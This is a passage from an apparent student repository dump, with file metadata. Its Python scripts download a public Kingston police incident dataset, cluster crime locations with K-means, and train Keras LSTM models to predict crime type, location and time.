model.evaluate(testX_main,testY_main,batch_size=10)\n\nprint(score)\n\nmodel.save('PredictHourOfYear.h5')\n" }, { "alpha_fraction": 0.7704545259475708, "alphanum_fraction": 0.7840909361839294, "avg_line_length": 25.823530197143555, "blob_id": "3458b05dcb014ed6ff5762e35c0a7a14bc2d62ab", "content_id": "ebea2f4766d2eb9cb7ee2f655d452b57412a27b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 440, "license_type": "no_license", "max_line_length": 97, "num_lines": 17, "path": "/README.md", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "# NeuralNets-Crime\n\nThe main files to look for are in the Project folder.\n\nThe main python files are Process_data.py, cluster.py, CrimeTypeMerged.py.\n\nThese contain the main elements of data processing, clustering and neural network implementation.\n\nThe results can be found in resultstrainpredict.csv and resultstestpredict.csv.\n\nOrder of type of crime by index:\n0: assault\n1: break and enter\n2: robbery\n3: sex assault\n4: theft\n5: theft of vehicle\n\n" }, { "alpha_fraction": 0.6189770102500916, "alphanum_fraction": 0.6740795373916626, "avg_line_length": 21.353591918945312, "blob_id": "ad190d2af8f4be1abfa41c9c612b3e580fe4c617", "content_id": "d0adf79cb50b4f4f9bf4e8e4223e01c4a68ffc91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4047, "license_type": "no_license", "max_line_length": 72, "num_lines": 181, "path": "/Project/cluster.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "from sklearn.cluster import KMeans\nfrom scipy.spatial.distance import cdist\nimport pickle\nimport numpy\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ndata = dataframe[:,7:9] #incident latitude & longitude\nindx = dataframe[:,:6] #crime type vector\n\ndat1 = numpy.empty(data.shape)\ndat2 = numpy.empty(data.shape)\ndat3 = numpy.empty(data.shape)\ndat4 = numpy.empty(data.shape)\ndat5 = numpy.empty(data.shape)\ndat6 = numpy.empty(data.shape)\n\n#initialize crime type counts\ni1=0\ni2=0\ni3=0\ni4=0\ni5=0\ni6=0\n\n#count crime type and add crime data to dat1..dat6 array\nfor i in range(len(data)):\n\tif indx[i][0] == 1:\n\t\tdat1[i1]+=data[i][:]\n\t\ti1+=1\n\telif indx[i][1] == 1:\n\t\tdat2[i2]+=data[i][:]\n\t\ti2+=1\n\telif indx[i][2] == 1:\n\t\tdat3[i3]+=data[i][:]\n\t\ti3+=1\n\telif indx[i][3] == 1:\n\t\tdat4[i4]+=data[i][:]\n\t\ti4+=1\n\telif indx[i][4] == 1:\n\t\tdat5[i5]+=data[i][:]\n\t\ti5+=1\n\telse:\n\t\tdat6[i6]+=data[i][:]\n\t\ti6+=1\n\n#for l=len(data)..0\nfor l in reversed(range(len(data))):\n\tif l > i1:\n\t\tdat1 = numpy.delete(dat1,l,0)\n\tif l > i2:\n\t\tdat2 = numpy.delete(dat2,l,0)\n\tif l > i3:\n\t\tdat3 = numpy.delete(dat3,l,0)\n\tif l > i4:\n\t\tdat4 = numpy.delete(dat4,l,0)\n\tif l > i5:\n\t\tdat5 = numpy.delete(dat5,l,0)\n\tif l > i6:\n\t\tdat6 = numpy.delete(dat6,l,0)\n\n'''\nCluster crime types\n'''\n\n#determine suitable number of cluster centers using 'elbow' method\nk_range = range(10,20) #try k = 10..19\n\n#perform K-means clustering for k = 10..19\nclust1 = [KMeans(n_clusters=k).fit(dat1) for k in k_range]\n\n#get centroids for all 10 clusterings\ncentroids1 = [X.cluster_centers_ for X in clust1]\n\n#distance between all datapoints and their cluster centers\nk_euclid1 = [cdist(dat1,cent,'euclidean') for cent in centroids1]\ndist1 = [numpy.min(ke,axis = 1) for ke in k_euclid1]\n\n#sum squared error\nwcss = [sum(d**2) for d in dist1]\n\n#best 
cluster clustering for k=10..19 is the one with minimum error \nbestclust1 = clust1[wcss.index(min(wcss))]\n\nprint(\"Finished cluster 1\")\n\n'''\n#1 done\n'''\n\nclust2 = [KMeans(n_clusters=k).fit(dat2) for k in k_range]\n\ncentroids2 = [X.cluster_centers_ for X in clust2]\n\nk_euclid2 = [cdist(dat2,cent,'euclidean') for cent in centroids2]\ndist2 = [numpy.min(ke,axis = 1) for ke in k_euclid2]\n\nwcss2= [sum(d**2) for d in dist2]\n\nbestclust2 = clust2[wcss2.index(min(wcss2))]\n\n\nprint(\"Finished cluster 2\")\n'''\n#2 done\n'''\nclust3 = [KMeans(n_clusters=k).fit(dat3) for k in k_range]\n\ncentroids3 = [X.cluster_centers_ for X in clust3]\n\nk_euclid3 = [cdist(dat3,cent,'euclidean') for cent in centroids3]\ndist3 = [numpy.min(ke,axis = 1) for ke in k_euclid3]\n\nwcss3= [sum(d**2) for d in dist3]\n\nbestclust3 = clust3[wcss3.index(min(wcss3))]\n\n\nprint(\"Finished cluster 3\")\n'''\n#3 done\n'''\n\nclust4 = [KMeans(n_clusters=k).fit(dat4) for k in k_range]\n\ncentroids4 = [X.cluster_centers_ for X in clust4]\n\nk_euclid4 = [cdist(dat4,cent,'euclidean') for cent in centroids4]\ndist4 = [numpy.min(ke,axis = 1) for ke in k_euclid4]\n\nwcss4 = [sum(d**2) for d in dist4]\n\nbestclust4 = clust4[wcss4.index(min(wcss4))]\n\n\nprint(\"Finished cluster 4\")\n'''\n#4 done\n'''\n\nclust5 = [KMeans(n_clusters=k).fit(dat5) for k in k_range]\n\ncentroids5 = [X.cluster_centers_ for X in clust5]\n\nk_euclid5 = [cdist(dat5,cent,'euclidean') for cent in centroids5]\ndist5 = [numpy.min(ke,axis = 1) for ke in k_euclid5]\n\nwcss5 = [sum(d**2) for d in dist5]\n\nbestclust5 = clust5[wcss5.index(min(wcss5))]\n\n\nprint(\"Finished cluster 5\")\n'''\n#5 done\n'''\n\nclust6 = [KMeans(n_clusters=k).fit(dat6) for k in k_range]\n\ncentroids6 = [X.cluster_centers_ for X in clust6]\n\nk_euclid6 = [cdist(dat6,cent,'euclidean') for cent in centroids6]\ndist6 = [numpy.min(ke,axis = 1) for ke in k_euclid6]\n\nwcss6 = [sum(d**2) for d in dist6]\n\nbestclust6 = clust6[wcss6.index(min(wcss6))]\n\n\nprint(\"Finished cluster 6\")\n'''\n#6 done\n'''\n\npickle.dump(bestclust1,open( \"clust1.p\",\"wb\"))\npickle.dump(bestclust2,open( \"clust2.p\",\"wb\"))\npickle.dump(bestclust3,open( \"clust3.p\",\"wb\"))\npickle.dump(bestclust4,open( \"clust4.p\",\"wb\"))\npickle.dump(bestclust5,open( \"clust5.p\",\"wb\"))\npickle.dump(bestclust6,open( \"clust6.p\",\"wb\"))\n\nprint(\"All clusters saved\")\n\n" }, { "alpha_fraction": 0.7316195368766785, "alphanum_fraction": 0.7475883960723877, "avg_line_length": 30.91025733947754, "blob_id": "07429e03f522c329e6fd22352f7d6a788ae1abd7", "content_id": "b4d4098ed80b31d7726070fbc80e5a86a56ce9cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1945, "license_type": "no_license", "max_line_length": 101, "num_lines": 61, "path": "/Project/CrimeType.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts upcoming crime type using last look_back crime types\n'''\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nSHAPE THE DATASET\n'''\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #length of 2/3rds into the dataset\ntest_size 
= int(len(dataframe)-train_size) #length 1/3rd of the dataset\n\n#2D arrays, subsets of dataframe containing only first 6 elements of each entry\ntrain_main = dataframe[0:train_size,:6]\ntest_main = dataframe[train_size:len(dataframe),:6]\n\ndef create_database(dataset,look_back=1):\n #3D arrays, len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ntrainX_main, trainY_main = create_database(train_main,4)\ntestX_main, testY_main = create_database(test_main,4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,6))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,6))\n\n'''\nRUN THE NEURAL NET\n'''\n\nmodel=Sequential()\nmodel.add(LSTM(32,input_dim=6,return_sequences=False))\nmodel.add(Dense(6))\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['accuracy','categorical_accuracy'])\nmodel.fit(trainX_main, trainY_main, nb_epoch=int(1),batch_size=10, verbose=2)\n\nscore = model.evaluate(testX_main,testY_main,batch_size=10)\n\nprint(score)\n\nmodel.save('CrimePredict.h5')\n" }, { "alpha_fraction": 0.6298660635948181, "alphanum_fraction": 0.6586732864379883, "avg_line_length": 31.434343338012695, "blob_id": "0d4c838fdc046dde4ce3843e2ee6c49584f195af", "content_id": "0b5e806d418e8c551a583e32e1537520e6ce1757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6422, "license_type": "no_license", "max_line_length": 529, "num_lines": 198, "path": "/Project/Process_data.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import re, time, urllib.request\nimport os\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport pickle\nimport math\nimport os\nfrom datetime import datetime\n\n'''\nTHIS PYTHON SCRIPT WILL DOWNLOAD THE DATASET\nAND FORMAT IT IN A PROPER METHOD WITH FOR USE\nWITH THE NEURAL NETWORK.\nWILL CREATE A FILE CALLED Kingston_Police_Formatted.csv\nWHICH IS THE FORMATTED POLICE DATA.\nRUN THIS FIRST\n'''\n\n\n\n#remove old dataset\nif (os.path.isfile('Kingston_Police.csv')):\n os.remove('Kingston_Police.csv')\n\n#calls and retrieves the data set\nurllib.request.urlretrieve(\"https://moto.data.socrata.com/api/views/fjwd-syvh/rows.csv?accessType=DOWNLOAD\",\"Kingston_Police.csv\")\n\n'''\nFunction that sorts data into proper\nhuman readable format using an alphanumerical strategy\n'''\ndef sort_nicely( l ):\n #function that converts string to int if possible\n convert = lambda text: int(text) if text.isdigit() else text\n\n #sort data by highest int value\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n l.sort( key=alphanum_key )\n return l\n\n'''\ninitializing all necessary variables to use\n'''\nincident_date_time=[]\nhour_of_year = []\nsin_cos_time = []\nincident_type = []\nincidenttype_set = set()\nincident_lat=[]\nincident_long=[]\ndatetimearr = []\nHour_of_Day_Cos = []\nHour_of_Day_Sin = []\nDay_of_Year = []\nDay_of_Week = []\nWeek_of_Year = []\nYear_Arr=[]\nloc_cluster = []\n'''\nLoads csv columns into arrays\nFilters through and prepares data\nfor exporting in formated manner\n'''\ni = 0;\nfor lines in open(\"Kingston_Police.csv\",\"r\"):\n if i == 0:\n labels=lines\n else:\n data = lines.split(',') #split 
row of csv\n date_time = datetime.strptime(data[2], '%m/%d/%Y %I:%M:%S %p') #convert entry 3 to datetime object\n hour_of_year = date_time.timetuple().tm_yday*24 + date_time.hour\n datetimearr+=[date_time]\n #convert incident_date_time into sin(2*pi*(time/maxtime)) and cos(2*pi*(time/maxtime))\n sin_cos_time += [[math.sin(2*math.pi*(hour_of_year/(365*24))), math.cos(2*math.pi*(hour_of_year/(365*24)))]];\n\n incident_date_time += [int(time.mktime(date_time.timetuple()))] #convert datetime to integer? idk\n incidenttype_set.add(data[3].lower())\n incident_type += [data[3].lower()]\n incident_lat += [float(data[12])]\n incident_long += [float(data[13])]\n loc_cluster += [[float(data[12]),float(data[13])]]\n i += 1\n'''\nTo use in order to normalize the latitude and longitude\n'''\nlatmax = max(incident_lat)\nlatmin = min(incident_lat)\nlongmin = min(incident_long)\nlongmax = max(incident_long)\n\n#normalize all latitude/longitude to values between 0-1\nnormalized_lat = []\nnormalized_long = []\nfor k in incident_lat:\n normalized_lat += [(k-latmin)/(latmax-latmin)]\n\nfor l in incident_long:\n normalized_long +=[(l-longmin)/(longmax-longmin)]\n\n#convert crime types to vectors of len(5)\nincident_type_unique = sort_nicely(list(incidenttype_set))\n\n'''\nimport kmeans clusters. These are generated by running cluster.py\n'''\nc1 = pickle.load(open(\"clust1.p\",\"rb\"))\nc2 = pickle.load(open(\"clust2.p\",\"rb\"))\nc3 = pickle.load(open(\"clust3.p\",\"rb\"))\nc4 = pickle.load(open(\"clust4.p\",\"rb\"))\nc5 = pickle.load(open(\"clust5.p\",\"rb\"))\nc6 = pickle.load(open(\"clust6.p\",\"rb\"))\n\n\n\n'''\nTurns a string of incident_type into a one hot array\nand predict cluster belonging\n'''\n\n\nfor x in incident_type:\n val = incident_type_unique.index(x)\n i= incident_type.index(x)\n if (val==0):\n incident_type[i]=[1,0,0,0,0,0]\n loc_cluster[i] = c1.predict(loc_cluster[i])\n elif (val ==1 or val==2):\n incident_type[i]=[0,1,0,0,0,0]\n loc_cluster[i] = c2.predict(loc_cluster[i])\n elif (val==3):\n incident_type[i]=[0,0,1,0,0,0]\n loc_cluster[i] = c3.predict(loc_cluster[i])\n elif (val==4 or val==5):\n incident_type[i]=[0,0,0,1,0,0]\n loc_cluster[i] = c4.predict(loc_cluster[i])\n elif (val==6):\n incident_type[i]=[0,0,0,0,1,0]\n loc_cluster[i] = c5.predict(loc_cluster[i])\n else:\n incident_type[i]=[0,0,0,0,0,1]\n loc_cluster[i] = c6.predict(loc_cluster[i])\n\n'''\nFormatting date time into multiple usable formats\nfor testing\n'''\nfor x in datetimearr:\n MinofDay = (x.timetuple().tm_hour*60)+ x.timetuple().tm_min\n Hour_of_Day_Cos+=[math.cos(2*math.pi*(MinofDay/(24)))]\n Hour_of_Day_Sin+=[math.sin(2*math.pi*(MinofDay/(24)))]\n Day_of_Year+=[x.timetuple().tm_yday]\n Day_of_Week+=[x.timetuple().tm_wday]\n Week_of_Year+=[math.floor(x.timetuple().tm_yday/7)]\n Year_Arr+=[x.timetuple().tm_year]\n\n\nfinal_list = []\n'''\nCreate final list to export\n'''\nfor x in range(len(incident_type)):\n final_list+=[[incident_type[x][0],incident_type[x][1],incident_type[x][2],incident_type[x][3],incident_type[x][4],incident_type[x][5],incident_date_time[x],incident_lat[x],incident_long[x],normalized_lat[x],normalized_long[x],sin_cos_time[x][0],sin_cos_time[x][1],Hour_of_Day_Cos[x],Hour_of_Day_Sin[x],Day_of_Year[x],Day_of_Week[x],Week_of_Year[x],Year_Arr[x],loc_cluster[x]]]\n\nfinal_arr = np.array(final_list)\n'''\nSort array chronologically using time\nin case certain elements are not chronological\n'''\nfinal_arr = final_arr[final_arr[:,6].argsort()]\n\nif (os.path.isfile('Kingston_Police_Formatted.csv')):\n 
os.remove('Kingston_Police_Formatted.csv')\n#write formatted data to Kingston_Police_Formatted.csv\nwith open('Kingston_Police_Formatted.csv','a') as out:\n for x in range(len(incident_type)):\n out.write(str(final_arr[x][0])+\",\"+str(final_arr[x][1])+\",\"+str(final_arr[x][2])+\",\"+str(final_arr[x][3])+\",\"+str(final_arr[x][4])+\",\"+str(final_arr[x][5])+\",\"+str(final_arr[x][6])+\",\"+str(final_arr[x][7])+\",\"+str(final_arr[x][8])+\",\"+str(final_arr[x][9])+\",\"+str(final_arr[x][10])+\",\"+str(final_arr[x][11])+\",\"+str(final_arr[x][12])+\",\"+str(final_arr[x][13])+\",\"+str(final_arr[x][14])+\",\"+str(final_arr[x][15])+\",\"+str(final_arr[x][16])+\",\"+str(final_arr[x][17])+\",\"+str(final_arr[x][18])+\",\"+str(final_arr[x][19])+\"\\n\")\n'''\n0:1st incident type\n1:2nd incident type\n2:3rd incident type\n3:4th incident type\n4:5th incident type\n5:6th incident type\n6:time in seconds since 1970\n7:incident latitude\n8:incident longitude\n9:normalized lat\n10:normalized long\n11:sin cos hour of year (sin)\n12:sin cos hour of year (cos)\n13:Hour of Day Cos\n14:Hour of Day sin\n15:Day of Year\n16:Day of Week\n17:Week of Year\n18:Year\n19:Location cluster index\n'''\n" }, { "alpha_fraction": 0.7311093211174011, "alphanum_fraction": 0.7475883960723877, "avg_line_length": 30.91025733947754, "blob_id": "93472f7273835bb2ccb0b4a524a9f530ef7ee369", "content_id": "7410886b6619f5a449c2244f76519db1e910cc73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 86, "num_lines": 78, "path": "/Project/CrimeAndClusterMerged.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nimport matplotlib.pyplot as plt\nfrom keras.utils.visualize_util import plot\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Merge\nfrom keras.layers import Input\nfrom keras.layers import Embedding\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n\n\n'''\ncreate_database will create a numpy array with each\ndatapoint having x number of previous data points.\n'''\ndef create_database(dataset,look_back=1):\n #3D arrays: len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ndef create_database_1(dataset,look_back=1):\n dataX = []\n dataY = []\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back)])\n dataY.append(dataset[i+look_back])\n\n return numpy.array(dataX), numpy.array(dataY)\n\n\n\n\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #Train dataset length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #Test dataset length 1/3rd of the dataset\n\n#Retrieving crime type from dataframe\ntrain_main_type = dataframe[0:train_size,:6]\ntest_main_type = dataframe[train_size:len(dataframe),:6]\n\n#Retrieving hour Of Year from dataframe\ntrain_DOY_main = dataframe[0:train_size,11:13]\ntest_DOY_main 
= dataframe[train_size:len(dataframe),11:13]\n\n#Retrieving location from dataframe\ntrain_loc_main = dataframe[0:train_size,19:]\ntest_loc_main = dataframe[train_size:len(dataframe),19:]\n\n'''\nUsing create_database to get the 4 previous values for each datapoint.\nCreates a 3D numpy array.\n'''\n#X: input, Y: expected output\ntrainX_main, trainY_main = create_database(train_main_type,5)\ntestX_main, testY_main = create_database(test_main_type,5)\n\ntrainX_DOY, trainY_DOY = create_database(train_DOY_main,5)\ntestX_DOY, testY_DOY = create_database(test_DOY_main,5)\n\ntrainX_loc, trainY_loc = create_database_1(train_loc_main,5)\ntestX_loc, testY_loc = create_database_1(test_loc_main, 5)" }, { "alpha_fraction": 0.7211201786994934, "alphanum_fraction": 0.7432905435562134, "avg_line_length": 32.60784149169922, "blob_id": "02635d4c2a72456f0d2eeb95db319be0c25d5898", "content_id": "3a88164716addacd03d709636d0b379165c44d70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "no_license", "max_line_length": 111, "num_lines": 102, "path": "/Project/MergedNN.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts upcoming crime type using last look_back crime types\n'''\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Merge\nfrom keras.layers import Input\nfrom keras.layers import Embedding\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nSHAPE THE DATASET\n'''\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #length 1/3rd of the dataset\n\ntrain_main_type = dataframe[0:train_size,:6]\ntest_main_type = dataframe[train_size:len(dataframe)-1,:6]\n\ntrain_DOY_main = dataframe[0:train_size,11:13]\ntest_DOY_main = dataframe[train_size:len(dataframe)-1,11:13]\n\ntrain_loc_main = dataframe[0:train_size,9:11]\ntest_loc_main = dataframe[train_size:len(dataframe)-1,9:11]\n\n\n\ndef create_database(dataset,look_back=1):\n #3D arrays, len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ntrainX_main, trainY_main = create_database(train_main_type,4)\ntestX_main, testY_main = create_database(test_main_type,4)\n\ntrainX_DOY, trainY_DOY = create_database(train_DOY_main,4)\ntestX_DOY, testY_DOY = create_database(test_DOY_main,4)\n\ntrainX_loc, trainY_loc = create_database(train_loc_main,4)\ntestX_loc, testY_loc = create_database(test_loc_main, 4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,6))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,6))\n\nprint(\"Reshape Type\",trainX_main.shape,testX_main.shape)\n\ntrainX_DOY = numpy.reshape(trainX_DOY,(trainX_DOY.shape[0],4,2))\ntestX_DOY = numpy.reshape(testX_DOY,(testX_DOY.shape[0],4,2))\n\nprint(\"Reshape HOY\",trainX_DOY.shape,testX_DOY.shape)\n\ntrainX_loc = 
numpy.reshape(trainX_loc,(trainX_loc.shape[0],4,2))\ntestX_loc = numpy.reshape(testX_loc,(testX_loc.shape[0],4,2))\n\nprint(\"Reshape Location\", trainX_loc.shape, testX_loc.shape)\n\nDOY_Branch = Sequential()\nDOY_Branch.add(LSTM(32,return_sequences=False,input_dim = 2))\nDOY_Branch.add(Dense(2))\n\nType_Branch = Sequential()\nType_Branch.add(LSTM(32,return_sequences=False,input_dim = 6))\nType_Branch.add(Dense(6))\n\nLoc_Branch = Sequential()\nLoc_Branch.add(LSTM(32,return_sequences=False,input_dim=2))\n\nmerged = Merge([DOY_Branch, Type_Branch, Loc_Branch], mode='concat')\n\nfinal_model = Sequential()\nfinal_model.add(merged)\nfinal_model.add(Dense(6,activation='softmax'))\n\nfinal_model.compile(optimizer='rmsprop', loss='mean_squared_error',metrics=['accuracy','categorical_accuracy'])\nfinal_model.fit([trainX_DOY, trainX_main, trainX_loc], trainY_main, nb_epoch=1,batch_size=10, verbose=2)\ntry:\n    print(\"Evaluating:\")\n    score = final_model.evaluate([testX_DOY, testX_main, testX_loc], testY_main, batch_size = 10)\n    print(\"Score is :\", score)\n\nexcept:\n    print(\"Couldn't evaluate due to nonetype error\")\n\nfinal_model.save('FunctionMergeCrimeHOY.h5')\n" }, { "alpha_fraction": 0.7117646932601929, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 26.81818199157715, "blob_id": "615c6eabf47c5180ecedaf4dd8bc48b4a884f259", "content_id": "c6fca4e2b67cf2b2f864e9b653c9c6e4741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 101, "num_lines": 55, "path": "/Project/Location.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts longitude and latitude of upcoming crimes\n'''\nimport numpy\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nSHAPE THE DATASET\n'''\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67)\ntest_size = int(len(dataframe)-train_size)\n\ntrain_main, test_main = dataframe[0:train_size,9:11], dataframe[train_size:len(dataframe),9:11]\n\ndef create_database(dataset,look_back=1):\n    dataX, dataY = [], []\n    for i in range(len(dataset)-look_back-1):\n        a= dataset[i:(i+look_back),:]\n        dataX.append(a)\n        dataY.append(dataset[i+look_back,:])\n    return numpy.array(dataX), numpy.array(dataY)\n\n\ntrainX_main, trainY_main = create_database(train_main,4)\ntestX_main, testY_main = create_database(test_main,4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,2))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,2))\n\n'''\nRUN THE NEURAL NET\n'''\n\nmodel=Sequential()\nmodel.add(LSTM(32,input_dim=2))\nmodel.add(Dense(2))\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['accuracy','categorical_accuracy'])\nmodel.fit(trainX_main, trainY_main, nb_epoch=10,batch_size=10, verbose=2)\n\nscore = model.evaluate(testX_main,testY_main,batch_size=10)\n\nprint(score)\n\nmodel.save('PredictLocation.h5')\n" }, { "alpha_fraction": 0.7280966639518738, "alphanum_fraction": 0.7430247068405151, "avg_line_length": 30.79096031188965, "blob_id": "bf63c6be141afe5038e86b126a031921a2ed932d", "content_id": "98289fcf804920b8a8d51211bf5bd72433e45daf", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 5627, "license_type": "no_license", "max_line_length": 108, "num_lines": 177, "path": "/Project/CrimeTypeMerged.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts upcoming crime type using last look_back crime types\n'''\nimport numpy\nimport matplotlib.pyplot as plt\nfrom keras.utils.visualize_util import plot\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Merge\nfrom keras.layers import Input\nfrom keras.layers import Embedding\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nTHIS FILE RUNS THE NEURAL NETWORK BY\nDEFINING THE ARCHITECTURE AND TRAINING IT.\nIT WILL ALSO TEST USING THE EVALUATE METHOD.\nWILL ALSO PRINT OUT A FILE WITH THE PREDICTED CLASSES\nUSING THE NEURAL NETWORK.\nRUN PROCESS_DATA.PY FIRST, THEN RUN THIS.\n'''\n\n\n'''\nSet the seed for the sake of being able to repeat the results\n'''\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #Train dataset length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #Test dataset length 1/3rd of the dataset\n\n#Retrieving crime type from dataframe\ntrain_main_type = dataframe[0:train_size,:6]\ntest_main_type = dataframe[train_size:len(dataframe),:6]\n\n#Retrieving hour Of Year from dataframe\ntrain_DOY_main = dataframe[0:train_size,11:13]\ntest_DOY_main = dataframe[train_size:len(dataframe),11:13]\n\n#Retrieving location from dataframe\ntrain_loc_main = dataframe[0:train_size,19:]\ntest_loc_main = dataframe[train_size:len(dataframe),19:]\n\n\n'''\ncreate_database will create a numpy array with each\ndatapoint having x number of previous data points.\n'''\ndef create_database(dataset,look_back=1):\n #3D arrays: len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ndef create_database_1(dataset,look_back=1):\n dataX = []\n dataY = []\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back)])\n dataY.append(dataset[i+look_back])\n\n return numpy.array(dataX), numpy.array(dataY)\n\n'''\nUsing create_database to get the 4 previous values for each datapoint.\nCreates a 3D numpy array.\n'''\n#X: input, Y: expected output\ntrainX_main, trainY_main = create_database(train_main_type,5)\ntestX_main, testY_main = create_database(test_main_type,5)\n\ntrainX_DOY, trainY_DOY = create_database(train_DOY_main,5)\ntestX_DOY, testY_DOY = create_database(test_DOY_main,5)\n\ntrainX_loc, trainY_loc = create_database_1(train_loc_main,5)\ntestX_loc, testY_loc = create_database_1(test_loc_main, 5)\n'''\nProperly reshaping the data so that network can take it.\n'''\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],5,6))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],5,6))\n\nprint(\"Reshape Type\",trainX_main.shape,testX_main.shape)\n\ntrainX_DOY = numpy.reshape(trainX_DOY,(trainX_DOY.shape[0],5,2))\ntestX_DOY = 
